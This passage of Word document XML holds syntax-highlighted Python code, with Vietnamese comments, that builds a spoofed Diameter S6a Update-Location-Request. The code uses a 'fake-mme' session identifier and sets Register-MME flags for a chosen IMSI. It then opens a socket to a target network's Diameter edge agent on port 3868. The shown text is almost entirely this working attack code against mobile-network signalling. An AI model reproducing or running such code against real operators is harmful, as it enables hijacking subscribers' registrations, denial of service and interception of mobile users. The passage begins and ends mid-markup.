      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">AVP_RAT_TYPE        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1032</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Vendor 3GPP</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">AVP_ULR_FLAGS       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1405</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Vendor 3GPP</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">APP_ID_S6a          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">16777251</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 3GPP S6a Application</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">CMD_ULR             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">316</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Update-Location-Request</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> build_avp(code, value, vendor_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">None</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, flags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x40</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""Xây dựng Diameter AVP theo RFC 6733"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> vendor_id:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        flags </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Vendor-Specific flag</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        header </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> struct.pack(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"!IBI"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, code, flags, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">len</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(value)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"!I"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, vendor_id)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">else</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"!IBI"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, code, flags, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">len</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(value)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avp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> header </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> value</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Padding to 4-byte boundary</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    pad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(avp)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return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> avp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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pad</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> build_ulr(imsi_str, origin_host, origin_realm, dest_realm, dest_host):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""Xây dựng Update-Location-Request message"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    imsi_bytes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> imsi_str.encode(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'utf-8'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    avps </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    avps </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> build_avp(AVP_SESSION_ID, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b"fake-mme;1;1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    avps </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> build_avp(AVP_USER_NAME, imsi_bytes)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    avps </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> build_avp(AVP_ORIGIN_HOST, origin_host.encode())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    avps </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> build_avp(AVP_ORIGIN_REALM, origin_realm.encode())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    avps </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> build_avp(AVP_DEST_REALM, dest_realm.encode())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    avps </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> build_avp(AVP_DEST_HOST, dest_host.encode())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    avps </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> build_avp(AVP_AUTH_APP_ID, struct.pack(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"!I"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, APP_ID_S6a))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    avps </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> build_avp(AVP_RAT_TYPE, struct.pack(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"!I"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1004</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                      vendor_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">10415</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 3GPP vendor, EUTRAN=1004</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    avps </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> build_avp(AVP_ULR_FLAGS, struct.pack(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"!I"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                      vendor_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">10415</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Register-MME + Skip-Subscriber-Data</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Diameter Header: Version(1) + Length(3) + Flags(1) + CmdCode(3) + AppID(4) + HopID(4) + E2EID(4)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    total_len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(avps)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    flags </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Request flag</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    header </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> struct.pack(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"!BBHBBBIII"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, (total_len </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">16</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total_len </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xFFFF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        flags, (CMD_ULR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">16</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(CMD_ULR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;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CMD_ULR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xFF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        APP_ID_S6a, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00000001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00000001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avps</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Gửi đến DEA</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sock </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sock.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">connect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">((</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"dea.target-network.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">3868</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
